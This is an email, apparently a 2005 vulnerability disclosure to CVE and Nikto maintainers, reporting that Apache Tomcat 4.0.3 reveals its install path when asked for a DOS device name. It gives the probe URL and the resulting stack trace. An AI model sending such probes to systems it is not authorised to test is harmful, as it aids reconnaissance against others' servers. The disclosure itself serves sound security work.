From: security curmudgeon To: Steven Christey , Sullo of Nikto Date: Thu, 13 Oct 2005 14:21:33 -0400 (EDT) Subject: Apache Tomcat 4.0.3 MS-DOS Device Request Path Disclosure Didn't see this in CVE or OSVDB. There is a known issue with several web servers including Resin, that when requesting a file that matches a MS-DOS file name, it will error out. Such errors will sometimes include installation path information. While testing a few servers, the Nikto check for this triggered, but the server wasn't Resin: Nikto check that triggered: + OSVDB-0: GET /lpt9.xtp : Resin 2.1 reveals the server path when a DOS device is requested. Actual server: + Server: Apache Tomcat/4.0.3 (HTTP/1.1 Connector) To verify: http://[target]:5225/lpt9.xtp Apache Tomcat/4.0.3 - HTTP Status 500 - Internal Server Error type Exception report message Internal Server Error description The server encountered an internal error (Internal Server Error) that prevented it from fulfilling this request. exception java.io.FileNotFoundException: C:\Program Files\Hewlett-Packard\Toolbox2.0\Apache Tomcat 4.0\webapps\ROOT\lpt9.xtp (The system cannot find the file specified) at java.io.FileInputStream.open(Native Method) at java.io.FileInputStream.(Unknown Source) at java.io.FileInputStream.(Unknown Source) [..]